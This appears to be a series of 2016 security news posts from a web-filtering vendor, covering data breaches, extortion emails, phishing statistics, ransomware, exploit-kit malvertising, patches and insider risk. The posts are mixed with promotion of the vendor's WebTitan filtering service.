Cybercriminals are quick to respond to large-scale data breaches and use the fear surrounding the attacks to scam individuals into paying ransoms, clicking on links to malicious websites, or opening infected email attachments. In recent weeks, the Internet has been awash with news reports of major data breaches that have hit networking sites and a number of popular Internet platforms.
Major data breaches affected LinkedIn, MySpace, and Tumblr, and while the stolen data are old, hundreds of millions of individuals have been affected.
These cyberattacks occurred in 2012 and 2013, although the data stolen in the attacks have just been listed for sale online. These major data breaches had gone undiscovered until recently.
Extortion Email Schemes Threaten Exposure of Sensitive Data
Due to the volume of logins that were exposed in these attacks and the popularity of the sites, many individuals may be concerned that their login credentials may have been obtained by hackers. Cybercriminals are taking advantage of this fear and are sending out huge volumes of spam emails advising individuals that their sensitive data have been obtained.
In the emails, individuals are told that their name, address, telephone number, credit card details, and other highly sensitive data are being held and that they will be distributed to friends and family if a ransom is not paid. The attackers warn their victims that access to social media accounts has been gained and that the attackers have details of all of the victim’s social media contacts.
The scammers are also threatening to email and mail out details of credit card transactions and internet activity to friends, family, and employers, suggesting that the payment to prevent this from happening will be much lower than the cost of a divorce, and low in comparison to the affect it will have on relationships with friends and on social standing.
To stop the distribution of these data, victims are required to pay the attackers anywhere from 2 to 5 Bitcoin – Between $250 and $1,200. A Bitcoin address is sent in the email which the victims must use. This ensures the transaction remains anonymous.
After analyzing the extortion email schemes, the FBI has concluded that the attacks are the work of multiple individuals. The FBI has advised against paying the ransoms as this will only ensure that this criminal activity continues. Paying a ransom is no guarantee that further demands will not be received.
Any person receiving an email that they believe to be an extortion email scheme should contact their local FBI office and send a copy of the email with the subject “extortion E-mail scheme,” along with details of the Bitcoin address where payment has been asked to be sent.
Extortion email schemes are often sent out randomly in spam email; however, responding to an email will alert the attacker that the email account is active and is being checked. The best course of action is to ignore the email, to log into social media accounts and change all passwords, and to carefully monitor bank accounts and credit card statements. The FBI also advises individuals to ensure social media accounts are configured with the highest level of privacy settings and to be extremely careful about sharing any sensitive data online.
On May 12, the microblogging website Tumblr notified users of a data breach that occurred in 2013. The company had kept quiet about the number of site users that were affected, although it has since emerged that 65 million account credentials were stolen in the Tumblr data breach. Stolen email addresses and passwords were recently offered for sale on a Darknet marketplace called TheRealDeal.
Tumblr Data Breach Ranks as One of the 5 Biggest Data Breaches of All Time
The massive Tumblr data breach may not be the largest ever discovered, but it certainly ranks as one of the biggest, behind the breach of 360 million MySpace account details, the theft of 164-million LinkedIn account credentials, and the 152 million-record Adobe breach. All of these huge data breaches occurred in 2013 with the exception of the LinkedIn breach, which happened a year earlier.
These breaches have something else in common. They were all discovered recently and the stolen data from all four data breaches have been listed for sale on illegal Darknet marketplaces by the same individual: A Russian hacker with the account “peace_of_mind” – more commonly known as “Peace”. It is not clear whether this individual is responsible for all four of these data breaches, but he/she appears to have now obtained all of the data.
The person responsible for the theft appears to have been sitting on the data for some time as according to Tumblr, as the login credentials do not appear to have been used.
Fortunately, the passwords were salted and hashed. Unfortunately, it would appear that the SHA1 hashing algorithm was used, which is not as secure as the latest algorithms. This means that hackers could potentially crack the passwords. The passwords were also salted so this offers more protection for individuals affected by the Tumblr data breach. However, as a precaution, site users who joined the website in 2013 or earlier should login and change their passwords.
Do You Reuse Passwords on Multiple Sites?
Even if victims of the Tumblr data breach have changed their password on the site before 2013, they may still be at risk of having their online accounts compromised if their password has been used for multiple online accounts.
If you have been affected by the Adobe, LinkedIn, MySpace, or Tumblr data breach, and there is a possibility that you have reused passwords on any on other platforms it is strongly advisable to change all of your passwords.
Peace may not be the only individual currently in possession of the data, and it is highly unlikely that the data will only be sold to one individual.
If you are unsure if your login credentials have been compromised, you can check by entering your email address or username on haveibeenpwned.com
A new phishing activity report published by the Anti-Phishing Working Group (APWG) shows that the threat from phishing websites is greater than any other time in the history of the Internet. The latest phishing activity report shows that in the past six months, the number of phishing websites has increased by a staggering 250%. Most of the new websites were detected in March 2016.
The Rising Threat from Phishing Websites Should Not Be Ignored
APWG was founded in 2003 in response to the rise in cybercrime and the use of phishing to attack consumers. The purpose of the organization is to unify the global response to cybercriminal activity, monitor the latest threats, and share data to better protect businesses and consumers.
In 2004, APWG started tracking phishing and reporting on the growing threat from phishing websites. During the past 12 years, the number of phishing websites being created by cybercriminals has grown steadily; however, the past six months has seen a massive rise in new websites that trick users into revealing sensitive data.
APWG reports that there is an increase in new malicious websites around the holiday season. In the run up to the holiday period when online shopping increases and Internet traffic spikes, there are more opportunities to relieve online shoppers of their credit card details, login credentials, and other sensitive data.
In late 2015, cybercriminals increased their efforts and there was the usual spike in the number of new phishing websites. However, after the holiday period ended APWG expected activity to reduce. That didn’t happen. New sites were still being created at elevated levels.
In the first quarter of 2016, APWG detected 289,371 new phishing websites were created. However, almost half of the new websites – 123,555 of them – were detected in March 2016. Aside from a slight dip in February, the number of new websites created has increased each month. March saw almost twice the number of new sites than were created in December. The figures for Q1 and for March were the highest ever seen.
Retail and Financial Sectors Most Frequently Targeted by Phishers
Phishers tend to favor well-known brands. The phishing activity report indicates little has changed in this regard. Between 406 and 431 brands are targeted each month. Most of the new sites target the retail industry which accounts for 42.71% of the new phishing websites detected in the first quarter of 2016. The financial sector was second with 18.67% of new sites, followed by the payment service industry with 14,74% and the ISP industry with 12.01%. The remaining 11.87% of new sites targeted a wide range of industries. The United States is the most targeted country and hosts the most phishing websites.
While phishing websites are now favored by cybercriminals, emails continue to be used to send malicious links and malware-infected attachments to consumers and businesses. In January, 99,384 phishing email reports were sent to APWG. The number increased to over 229,000 in February and stayed at that level in March.
APWG also tracked malware infections. In the first quarter of the year, 20 million malware samples were intercepted – an average of 6.67 million malware samples a month.
The report shows how critical it is for business to take action to prevent end users from visiting malicious websites and the seriousness of the threat from phishing websites.
One of the best ways that businesses can reduce the risk of employees visiting phishing websites is to use a web filtering solution. By controlling the sites that can be accessed by employees, the risk of phishing, malware infections, and ransomware attacks can be greatly reduced.
Surprisingly, after ESET sent a request for the TeslaCrypt ransomware master key to the criminal gang behind the attacks, they responded by making the decryption key public and even issued an apology. The surprise move signals the end of the ransomware that was used primarily to target gamers
TeslaCrypt Ransomware Master Key Released
So does the release of the TeslaCrypt ransomware master key mean that the attacks will now stop? The answer to that is a little complicated. Attacks using TeslaCrypt will slow and stop soon, and even if some individuals have their computer files locked by the ransomware they will not need to pay a ransom.
Once the TeslaCrypt ransomware master key was made public, security companies started work on decryption tools to unlock infections. ESET have added the key to their TeslaCrypt decryption tool, and Kaspersky Lab similarly used the master key to update the decryption tool it had been using to unlock earlier versions of the ransomware.
That does not mean that the criminal gang behind the campaign will stop its malicious activity. It just means that the gang will stop using TeslaCrypt. There are many other types of ransomware that can be used for attacks. In fact, it would appear that TeslaCrypt has now simply been replaced with a new form of ransomware called CryptXXX. According to ESET, many of the distributers of TeslaCrypt have already switched to CryptXXX.
Under normal circumstances, contacting a criminal gang and asking for the TeslaCrypt ransomware master key would not have worked. Attackers running profitable ransomware campaigns are unlikely to respond to a polite request asking to unlock an infection without paying a ransom, let alone supply a master key that can be used to unlock all infections.
The reason for the release is TeslaCrypt was already being phased out. ESET researcher Igor Kabina noticed that TeslaCrypt infections were slowing, which signaled that either the gang behind the ransomware was phasing it out in favor of a new malware, or that a new and updated version of TeslaCrypt would soon be released. Kabina decided to contact the attackers through the channels set up to allow victims to contact the gang and pay the ransom.
Kabina asked for the private decryption keys to unlock all four versions of the ransomware. He was answered within one day and was provided the key for the version he claimed to have been infected with. He then sent another message requesting the release of the latest key to unlock v4 of the ransomware, and noticed on the TeslaCrypt page that the gang had announced that the project had been closed. The universal key had been posted on an anonymous .onion page that can be accessed using the Tor browser.
There is a constant battle between security companies and ransomware developers. Oftentimes, ransomware variants contain flaws that allow antivirus companies to develop decryption tools. When these tools are released attackers work rapidly to repair the security flaw and release a new, more robust version of the ransomware. This was the case with TeslaCrypt. Flaws in the first version allowed a tool to be developed. A decryption tool was released, and version 2 of the ransomware was released. TeslaCrypt is now on the fourth version.
As with Cryptowall, TeslaCrypt has now been shut down; however, CryptXXX is still very much active and is still being updated. Furthermore, the attackers have learnt from their mistakes and have developed CryptXXX to be a much harder nut to crack.
CryptXXX is run alongside a program that monitors the system on which it is run to check if it is in a virtual environment or sandbox or otherwise being probed. If abnormal behavior is identified, the encryption routine is restarted. CryptXXX is also spread via spam email, exploit kits, and malvertising. This means that it is much easier to spread and more attacks are likely to occur. Companies and individuals therefore face a much higher risk of an attack.
The release of the TeslaCrypt ransomware master key is therefore only good news if you have been infected with TeslaCrypt. With the move to CryptXXX it is even more important to have solutions in place to prevent attacks, and a plan in place to deal with an attack when it occurs.
A new study has recently been published showing the impact of security breaches on brand image, and how the behavior of consumers changes when companies experience data breaches that expose private data.
Cyberattacks are now taking place with such frequency that data breaches are now to be expected. It is no longer a case of whether a security breach will occur, it is now just a case of when it will happen. Even with the best protections in place to protect sensitive data, breaches will still occur.
Many consumers are aware that the current threat levels are greater than ever and that cyberattacks will occur. However, how do consumers react to breaches of their personal information? Do they forgive and forget or are they taking their business elsewhere?
What is the Impact of Security Breaches on Brand Image?
The FireEye study set out to examine the impact of security breaches on brand image. 2,000 interviews were conducted on consumers in the United States to find out whether security incidents changed behavior and whether data breaches altered perceptions of companies and trust in brands.
The results of the survey clearly show that the failure to invest in robust cybersecurity defenses can have a major impact on revenue. 76% of surveyed consumers claimed they would take their business elsewhere if they believed a company’s data handling practices were poor or that the company was negligent with regard to data security.
75% of respondents said they would likely stop making purchases from a company if they felt that a security incident resulted from a failure of the company to prioritize cybersecurity.
Loss of business is not the only problem companies will face following a data breach. If a breach of personal information occurs and data are used by criminals for identity theft or fraud, 59% of consumers would take legal action to recover losses.
Even when companies take action to mitigate the risk of losses being suffered by consumers – such as providing identity theft protection services – brand image remains tarnished. Reputation damage after a data breach is suffered regardless of the actions taken by companies to mitigate risk. It can also take a considerable amount of time to regain consumers’ trust. More than half of respondents (54%) said that their impression of companies was negatively impacted after a security breach occurred.
Fast action following a data breach can help to restore confidence, but this is expected by consumers. The survey showed that 90% of consumers expect to be notified of a breach of data within 24 hours of an attack taking place, yet this is something that rarely happens. All too often consumers are made to wait weeks before they are informed of a breach of their personal information.
The study also shows that as a result of large-scale breaches consumers are now much less trusting of companies’ ability to keep data secure. They are also much more cautious about providing personal information. 72% of consumers said they now share less information with companies due to the volume of data breaches now being suffered.
The take home message from the survey is organizations must do more to protect consumer data and to prevent data breaches from occurring. If companies invest heavily in cybersecurity and can demonstrate to consumers that they take privacy and security seriously, the negative impact of security breaches on brand image is likely to be reduced.
The not-for-profit technology industry association CompTIA recently released its 2016 International Trends in Cybersecurity report after analyzing the current state of cybersecurity and assessing behaviors and techniques currently being used by organizations around the world to tackle the growing risk of cyberattacks.
To compile the report, CompTIA surveyed 1,509 IT security professionals from 12 countries around the world, including Australia, Canada, India, Brazil, Malaysia, Japan, South Africa, the UAE and the UK.
The International Trends in Cybersecurity report shows that information security is still a major concern for IT and business executives, which is perhaps no surprise given the number of cybersecurity threats they now have to deal with. The report showed that over the course of the past 12 months, 73% of organizations had experienced at least one security incident and 60% of those security incidents were classed as serious.
The highest number of security incidents occurred in India, where 94% of companies experienced a security breach in the past 12 months, closely followed by Malaysia on 89%, and Brazil and Mexico with 87% of companies suffering at least one breach. Japan and the UAE fared the best, with just 39% and 40% of companies self-reporting a security breach.
Security incidents involving mobile devices are becoming much more prevalent as the use of the devices increases. 76% of companies across all 12 countries experienced a mobile-related data breach in the past 12 months. In Thailand, 95% of companies had experienced a mobile-related security breach. In the UK, 64% of companies experienced a mobile-related incident. Companies in Japan and the UAE fared the best with 60% of companies experiencing breach of mobile data.
Human error continues to be a major cause of security breaches and the situation is getting worse. Companies are tackling the issue with training to improve awareness of cybersecurity issues and ensure security best practices are adopted.
Nearly 80% of managers responsible for data security expect cybersecurity to become even more important over the next two years. The increasing reliance on mobile technology and cloud computing has required a major rethink about how systems and data need to be protected from attack. These were listed as the main drivers behind changes in cybersecurity practices in 10 out of the 12 countries where respondents were located.
To reduce the risk of malware infections from websites you can avoid certain types of sites that are commonly used by cybercriminals to infect visitors. Sites containing pornography for instance, torrents sites, and online marketplaces selling illegal medication for example. However, while these sites are often compromised with malware or contain malicious code, they are far from the most common sites used by cybercriminals to infect visitors.
The unfortunately reality is that browsing the Internet and only visiting what are perceived to be “safe sites” does not mean that you will not be exposed to maware, malicious code, and exploit kits. Hackers are increasingly compromising seemingly legitimate websites to redirect visitors to sites containing exploit kits that download malware and ransomware.
Two CBS-affiliated news websites were recently discovered to be hosting malicious adverts that redirect visitors to sites containing the Angler Exploit Kit. MSN has been found to host malvertising in the past, as has Yahoo. A study conducted by anti-virus company Symantec revealed that three quarters of websites contain security vulnerabilities that could potentially be exploited to infect visitors with malware.
High Profile Websites Compromised and Used to Deliver Ransomware to Visitors
This week, two new websites were found to have been compromised and were used to infect visitors with malware.
The celebrity gossip website PerezHilton.com may cause problems for celebrities, but this week it was also causing problems for its visitors. The site attracts millions of visitors, yet few would suspect that visiting the site placed them at risk of having their computer files locked with powerful file-encrypting ransomware.
However, that is exactly what has been happening. Hackers compromised an iframe on the site and inserted malicious code which redirected visitors to a website containing the Angler Exploit Kit. Angler probes visitors’ browsers for security vulnerabilities and exploits them; silently download a payload of malware. In this case, the Angler Exploit Kit was used to push Bedep malware, which in turn silently downloaded CryptXXX ransomware onto the victims’ devices.
A second malvertising campaign was also conducted that redirected visitors to a different website. The exploit kit used to infect redirected visitors was different, but the end result was the same. A malicious payload was downloaded onto their devices.
Another well-known website was also discovered to have been compromised this week. The website of the world renowned French film production company Pathé was discovered to have been compromised. Hackers had managed to embed malicious code in one of the webpages on the site. The code also redirected users to a site hosting the Angler Exploit Kit, which similarly was used to infect visitors with CryptXXX ransomware.
How to Reduce the Risk of Malware Infections from Websites
Exploit kits take advantage of security vulnerabilities in browsers. To reduce the risk of malware infections from websites it is essential that browsers are kept up to date. That includes all browser plugins. If no security vulnerabilities exist, there would be nothing for exploit kits to exploit.
However, zero-day vulnerabilities are emerging all the time and software manufacturers are not always quick to develop fixes. Adobe was alerted to a new zero-day vulnerability a few days ago, yet they only just released a fix. During that time, the vulnerability could have been exploited using exploit kits. Cybercriminal gangs are quick to incorporate new zero-day vulnerabilities into their exploit kits and do so faster than software companies can release fixes. Ensuring all updates are installed promptly is a great way to reduce the risk of malware infections from websites, but additional measures need to be taken.
If you really want to improve your – or your company’s – security posture and really reduce the risk of malware infections from websites, you should use a web filtering solution. This is particularly important for businesses to ensure that employees do not inadvertently compromise the network. It can be difficult to ensure that all devices used to connect to the network are kept 100% up to date, 100% of the time.
A web filtering solution can be configured to block malvertising, blacklists can be used to prevent compromised websites from being accessed, and malware downloads can be prevented. Along with good patch management practices, it is possible to effectively reduce the risk of malware infections from websites.
This week, patch Tuesday saw updates issued to address actively exploited security vulnerabilities in Internet Explorer, along with a swathe of fixes for a number of other critical Microsoft security vulnerabilities. In total, Microsoft issued fixes for 51 vulnerabilities this week spread across 16 security bulletins, half of which were rated as important, the other eight being rated as critical.
The updates tackle vulnerabilities in Microsoft Edge and Internet Explorer, Windows, the Microsoft .NET Framework, and MS Office; however, it is the browser fixes that are the most important. These include actively exploited security vulnerabilities that can be used to compromise computers if users visit websites containing exploit kits.
Security update MS16-051 tackles the CVE-2016-0189 zero-day vulnerability in Internet Explorer, which if exploited, would allow an attacker to gain the same level of privileges as the current user. The flaw could be used to take control of the entire system. The exploit could be used to install new programs on the device, create new accounts, or modify or delete data. The vulnerability modifies the functioning of JScript and VBScript, changing how they handle objects in the computer’s memory.
The IE security vulnerability was brought to the attention of Microsoft by researchers at Symantec, who had discovered an active exploit that was being used alongside spear-phishing attacks in South Korea. Users were being directed to a website containing an exploit kit that had been updated with the IE security vulnerability.
The MS16-052 security update tackles a vulnerability in Microsoft Edge which similarly changes how objects in the memory are handled. These two updates should be prioritized by sysadmins, although all of the updates should be installed as soon as possible. Even the important updates could potentially be exploited and used to gain control of unpatched computers.
Bulletin MS16-054 is also a priority update to patch critical vulnerabilities in Adobe Flash. Since Flash is embedded in both Edge and IE, Microsoft has started issuing updates to address Adobe Flash vulnerabilities. While these security flaws are not believed to have been exploited in the wild, it will not be long before they are included in exploit kits.
Microsoft may have fixed its actively exploited security vulnerabilities, but despite Adobe issuing patches for Acrobat, ColdFusion, and Reader on Tuesday, Flash remains vulnerable to attack. Adobe has yet to issue a patch for an actively exploited Flash security vulnerability (CVE-2016-4117) that affects version 126.96.36.199 and all earlier versions of the platform. This vulnerability has been included in exploit kits and can be used to take control of devices. In total, Adobe fixed 92 separate vulnerabilities in its Tuesday update.
Between Microsoft and Adobe, 143 vulnerabilities have been addressed this week. With hackers quick to add the vulnerabilities to website exploit kits, it is essential that patches are installed rapidly. These actively exploited security vulnerabilities also highlight the importance of using a web filtering solution to prevent users from visiting compromised websites where the vulnerabilities can be exploited.
Finding a web security service for MSPs can be a time consuming process. There are a number of solutions that allow MSPs to keep their clients protected from malware and reduce the risk from internal and external threats, yet many are far from ideal for use by MSPs.
The ideal web security service for MSPs must have a relatively low cost of ownership. Clients may be more than willing to implement a web security service to deal with the growing range of web-borne threats, but the cost of implementation is a key factor.
Many solutions offer all the necessary benefits for the client, but are not practical for use by MSPs. The time taken to install web security solutions and to configure them for each client can reduce profitability. The best web security service for MSPs need to be easy to install and maintain, and have a low management overhead.
Low cost solutions that are quick to install and easy to maintain allow MSPs to easily incorporate into existing packages to create a more comprehensive Internet security service. This can increase the value provided to clients, boost client revenue, and help MSPs to win more business and differentiate their company in the marketplace.
The ideal web security service for MSPs is available as a white label. This allows the service to be easily incorporated into existing packages. White labeling allows MSPS to strengthen their own brand image rather than promoting someone else’s.
Many providers of a web security service for MSPs fall down on customer support. If any issues are experienced, it is essential that an MSP can provide rapid solutions. Industry-leading technical support is essential.
WebTitan Cloud – A Web Security Service for MSPs That Ticks All the Right Boxes
WebTitan Cloud is an enterprise-class web filtering solution for MSPs that can be used to enforce clients’ acceptable use policies and control the content that can be accessed via their wired and wireless networks.
Our DNS-based web filtering solution allows organizations to prevent phishing, stop malware downloads, protect against ransomware and botnet infections, and block spyware and adware. Controls prevent the bypassing of the content filter by blocking anonymizer services. Encrypted web traffic is also inspected.
Implementation could not be any easier. There is no need for any hardware purchases or software downloads. All that is required is a change to the DNS to point to our servers and the Internet can be filtered in under 2 minutes.
Configuring each client to incorporate their AUPs is also a quick and easy process requiring no technical expertise. Highly granular controls ensure AUPs can be quickly and easily applied. There is no need to use on premise support teams. Everything can be monitored via the control panel from any Internet browser. There is no hardware or software to maintain and no patches to apply, reducing management overhead considerably. Cloud keys can be supplied to allow guests to bypass organization-wide content control settings, with time-limits applied to prevent abuse.
Reporting is effortless. A full suite of pre-defined reports can be generated automatically and scheduled for each client to allow Internet access to be carefully monitored.
We also offer fully white-labeled solutions for MSPs allowing logos, branding, and corporate color schemes to be easily incorporated. We are also more than happy to allow WebTitan Cloud to be hosted within an MSPs infrastructure.
To find out more about why WebTitan Cloud is a game changing web security service for MSPs contact our sales team today!
Over the past two weeks there have been three worrying instances of the Angler exploit kit being used to infect website visitors with malware and ransomware. Cybercriminals are increasingly using exploit kits to deliver their malicious payloads and all organizations need to be aware of the risk.
Why AUPs May Not Be Sufficient to Keep Networks Secure
Many companies advise employees of the types of websites that can be accessed via work networks and which are forbidden. Typically, employees are banned from visiting pornographic websites, using the Internet for the sharing of copyright-protected material, installing shareware or other unauthorized software, and using unauthorized web applications and gaming sites.
Employees are provided with a document which they are required to read and sign. They are informed of the actions that will be taken for breaching the rules: verbal and written warnings for example, and in some cases, instant dismissal. These AUPs are usually effective and employees do heed the warnings if they value their jobs.
If an employee breaches the AUPs and accesses pornography for instance, action can be taken against that individual. It is probable that no harm will have been caused and the matter can be dealt with by HR.
However, if an employee breaches AUPs and visits a website that has been compromised with malware or installs shareware that includes malicious files, taking action against the employee will not undo the damage caused.
To better protect networks, AUPs should be enforced with a software solution. By implementing a web filtering solution, HR departments can ensure that inappropriate website content is not accessed, while IT departments can be prevented from having to deal with malware infections.
Even if AUPs are followed to the letter, malware may still be downloaded onto the network. The risk has recently been highlighted by two security incidents discovered in the past two weeks.
Legitimate Websites Compromised with Angler Exploit Kit
Last week, news emerged that a toy manufacturer’s website had been compromised and was being used to infect visitors with malware. The website had been loaded with the Angler exploit kit and was being used to silently infect visitors’ devices with ransomware.
An exploit kit is a malicious toolkit used by hackers to probe for security vulnerabilities in website visitors’ browsers. A visitor to a website containing an exploit kit – BlackHole, Magnitude, Nuclear, Styx, or Angler for example – will have their browser checked for out of date plugins such as Adobe Reader, Silverlight, Flash, or Java. If the plugins are not up to date, security vulnerabilities can be exploited to download a payload of malware. These attacks are silent and the website visitor will be unaware that their machine has been compromised.
This week, two more websites were discovered to have been hijacked and were being used to direct visitors to the Angler exploit kit. These websites were much more likely to be visited by company employees. They were the sites of two CBS-affiliated TV stations: KMOV in St. Louis and WBTV in Charlotte, North Carolina.
These news websites would be unlikely to be banned in AUPs, and few organizations would see the risk of their employees visiting these websites.
News Websites Contained Malvertising Directing Users to the Angler Exploit Kit
While the toy manufacturer’s website was directly infecting web visitors, in the case of KMOV and WBTV the attackers were using a common technique called malvertising. The websites had not been loaded with the Angler exploit kit, instead the attacks were taking place via third party adverts that were being served on the sites.
The sites contain adblocks which were used to serve advertisements via the Taggify network – a legitimate advertising network. However, a rogue advertiser had got around the controls put in place by Taggify and malicious adverts were being served.
Reduce Risk of Attack with a Web Filtering Solution
These three recent cases are just the tip of the iceberg. Criminals are hijacking all manner of websites and using them to host exploit kits. Legitimate websites serving third party adverts are also being targeted with malvertising.
Enforcing AUPs with a web filtering solution can help to prevent end users from visiting websites that have been compromised with malware. A web filter – such as WebTitan – can also be used to block third party advertisements from being displayed.
Unfortunately for enterprises, it is not possible to install patches as soon as they are released. Many patches require reboots, and that is not practical. The number of patches being released to plug security holes is considerable, and it takes time to patch all devices that connect to a network. Good patch management policies can reduce the likelihood of a successful attack, but they cannot prevent all attacks from taking place. If a web filtering solution is used that can block malvertising and websites known to contain malware, end users and networks will be better protected.
There are some very good reasons why you should block file sharing websites. These websites are primarily used to share pirated software, music, films, and TV shows. It would be unlikely for the owner of the copyright to take action against an employer for failing to prevent the illegal sharing of copyrighted material, but this is an unnecessary legal risk.
However, the main risk from using these websites comes from malware. Research conducted by IDC in 2013 showed that out of 533 tests of websites and peer-2-peer file sharing networks, the downloading of pirated software resulted in spyware and tracking cookies being downloaded to users’ computers 78% of the time. More worryingly, Trojans were downloaded with pirated software 36% of the time.
A survey conducted on IT managers and CIOs at the time indicated that malware was installed 15% of the time with the software. IDC determined that overall there was a one in three chance of infecting a machine with malware by using pirated software.
Even visiting torrent sites can be harmful. This week Malwarebytes reported that visitors to The Pirate Bay were served malicious adverts. An advertiser used a pop-under to silently redirect users to a malicious site containing the Magnitude exploit kit which was used to downloaded Cerber ransomware onto users’ devices.
A study conducted by UC San Diego involved testing pirated software downloads using VirusTotal. VirusTotal checks files against the databases of 47 different anti-virus engines. The research team determined that 50% of pirated files were infected with malware.
Dealing with malware from pirated software was determined to take around 1.5 billion hours per year. For businesses the cost can be considerable. IDC calculated the cost to enterprises to be around $114 billion in 2013 alone. And that was just for the clean-up. The cost of data breaches caused by illegal software installations was estimated to be in the order of $350 billion.
Time to Block File Sharing Websites?
Organizations can monitor devices and check for unauthorized software installations on individual devices; however, by the time a software installation has been discovered, malware is likely to already have been installed. A recent report by Verizon suggests that on average, hackers are able to exfiltrate data within 28 minutes of gaining access to a system.
One of the easiest ways to manage risk is to block file sharing websites such as P2P and torrent sites. A web filter can be easily configured to block file sharing websites and prevent them from being accessed. Many web filters can also be configured to block specific file types from being downloaded, such as keygens and other executables.
By blocking file sharing websites organizations can ensure that copyright-violating activities are prevented and malware risk is effectively managed. Furthermore, web filters can be used to block web-borne threats such as phishing websites, compromised webpages, spam and botnets, adware, malware, ransomware, and anonymizers.
The failure to block file sharing websites could turn out to be costly. It is far better to block potentially dangerous websites and online activities than to have to cover the cost of removing malware infections and dealing with data breaches.
One cybercriminal gang has resorted to a mafia-style protection racket to obtain money, although it would appear that businesses are being sent empty DDoS threats. While many companies have sent money to the criminal gang, which claims to be the Armada Collective, there is no evidence to suggest that the gang is following through on its threat of conducting a largescale Distributed Denial of Service attacks.
Empty DDoS Threats Still Proving Lucrative for Attackers
The gang has been sending emails to businesses threatening them with a powerful DDoS attack if they do not send protection money to the gang. The demands appear to range from 10 to 50 Bitcoin and over 100 organizations have given in to the attackers demands according to DDoS mitigation vendor CloudFlare. So far the gang has gathered around $100,000 in payments, yet no DDoS attacks have been conducted.
Armada Collective is the name of a hacking group already known to conduct massive DDoS attacks. The emails claim that the gang is able to deliver a DDoS attack in excess of 1 Tbps per second. The group also claims to be able to bypass security controls set up to protect against DDoS attacks. In case recipients of the email are in any doubt as to who the attackers are and what they are capable of, they are advised to conduct a search on Google. Armada Collective has been known to conduct DDoS attacks up to 500 Gbps.
Are the Latest Emails from a Copycat Group?
According to CloudFlare, it may not be a case of the hackers not having the capability to pull off a large scale DDoS attack on companies that do not pay, rather the attackers may not be able to tell who has paid and who has not. The emails are reusing Bitcoin addresses so there is no way of confirming which companies have paid. Emails are also being sent containing the same text and payment demands, regardless of the size of the organization.
However, the empty DDoS threats or not, many companies are unprepared to take the risk and have paid between $4,500 and $23,000 to stop the attacks.
CloudFlare suspects that the extortionists are not who they claim to be. The Armada Collective has not been conducting attacks for some time. CloudFlare researchers believe that the group has been operating under a different name – DD4BC. However, suspected members of that group have been arrested as part of Operation Pleiades last year – an International effort to bring down hacking groups that have been conducting DDoS attacks.
The group behind this campaign may well be imposters, although many hackers send out threats of DDoS attacks along with demands for payment. Some of those attackers are more than willing to follow through on the threats and have the capability to launch attacks.
It is never a good idea to give into attackers’ demands, but it is important to ensure that protections have been put in place to resist DDoS attacks and to seek advice before taking any action if an email demand is received.
Organizations are investing in technology to ensure the perimeter defense are not breached; however, it is also important to address the risk of insider data breaches. According to a recent report from Forrester, internal incidents were responsible for more than half of data breaches suffered by firms. Cybercriminals have stepped up their efforts and are attacking organizations with increased vigor, but the report suggests more than half of data breaches are caused by employee errors, oversights, and negligence.
Employees are under increasing pressure to get more work completed in less time. This can easily lead to errors being made or shortcuts being taken. Employees may be security minded most of the time, but it is all too easy for sloppy data security practices to creep in. Even with the most robust perimeter security defenses in place, simple mistakes can lead to disaster.
Email Borne Attacks Are Still A Major Risk
During the past 12 months the volume of spam email has fallen considerably. This is partly due to law enforcement taking down major botnets and the increasing use of efficient spam filters. Even with the reduced volume the threat from spam email is considerable. The Forrester report indicates spam email volume has dropped from almost 89% of all emails in 2014 to 68% of emails in 2015. However, over 91% of all spam emails contain a malicious link and 2.34% contain malicious email attachments.
Cybersecurity awareness training has helped to mitigate the risk of insider breaches to some degree but they are still occurring. Most employees now know not to open email attachments from people they do not know, but what about from people they do know?
There has been an increase in business email compromise attacks in recent months. These attacks involve the sending of spam and phishing emails from within an organization. These emails are more likely to result in malicious email attachments being opened and links being clicked than emails from strangers. All emails should be treated as suspicious and should be carefully checked, not only those from outside an organization.
Employees are aware never to run an executable file that has been sent via email and to be wary of opening zip files from strangers. The Forrester report suggests that attackers are increasingly using standard office files to infect their targets. Microsoft Office files are used in 44.7% of attacks.
Employees who install unauthorized software are also placing their companies at risk. The use of shadow IT is behind many data breaches. Cybercriminals are exploiting vulnerabilities in the software installed by end users. Many of these programs contain serious vulnerabilities.
How to Address the Risk of Insider Data Breaches
Tacking the threat from within is more complicated that securing the defense perimeter as it is far harder to prevent employees from making simple mistakes. Organizations must take steps to reduce the likelihood of mistakes being made, while also ensuring that when employees do make data security snafus do not prove to be catastrophic.
Some of the ways organizations can address the risk of insider data breaches include:
- Conduct background checks before hiring new staff
- Ensuring access to systems is terminated before staff are
- Limiting network privileges
- Block the copying of critical data onto portable devices
- Provide all new staff with data security training
- Regularly conducting refresher training sessions
- Conducting quarterly cybersecurity fire-drills to ensure training is not forgotten.
- Sending regular email bulletins to keep cybersecurity awareness training fresh in the mind
- Sending dummy phishing emails to staff to test the effectiveness of training
- Scanning for shadow IT installed on user devices
- Ensuring bank transfer requests are checked by two individuals before being authorized
- Using a web filtering service to block phishing websites and limiting access to potentially risky websites
- Configuring a web filter to block the downloading of risky file types
It may not be possible to eliminate the risk of insider data breaches, but it is possible to effectively mitigate risk.
The healthcare industry has had a hard time in recent months; however, it is far from the only industry being targeted by hackers. Manufacturing company cyberattacks are on the increase and the industry is now second only to healthcare according to a new report from IBM X-Force Research. The manufacturing industry has replaced the financial sector as hackers attempt to gain access to intellectual property. Intellectual property can be sold for big bucks on the black market.
$400 Billion Worth of Intellectual Property Is Stolen from U.S. Companies Every Year
According to figures from the Federal Bureau of Investigation, each year over $400 billion worth of intellectual property is stolen from the United States and sold overseas. Many of the attacks are conducted by nation-state backed hacking groups, although a number of players have now got in on the act due to the value of data and the relative ease of breaking through manufacturing company cybersecurity defenses.
According to the IBM’s 2016 Cyber Security Intelligence Index, manufacturers in the automotive sector were most frequently targeted. Chemical companies were the second most likely to be attacked. 30% of manufacturing company cyberattacks took place on automotive manufacturers.
Not only are the potential rewards for successful manufacturing company cyberattacks high, attacks are relatively easy to pull off. A successful attack on a company in the financial sector may be rewarding, but the defenses put in place to keep hackers at bay are usually far more robust than in less well regulated industries such as manufacturing. The manufacturing industry has been relatively slow to improve cybersecurity defenses.
Organizations in the healthcare industry are required to comply with the Health Insurance Portability and Accountability Act or HIPAA for short. HIPAA sets a number of minimum standards which must be met by all healthcare organizations. Administrative, technical, and physical safeguards must be implemented to keep patient data protected. The legislation has forced healthcare companies to improve their cybersecurity defenses.
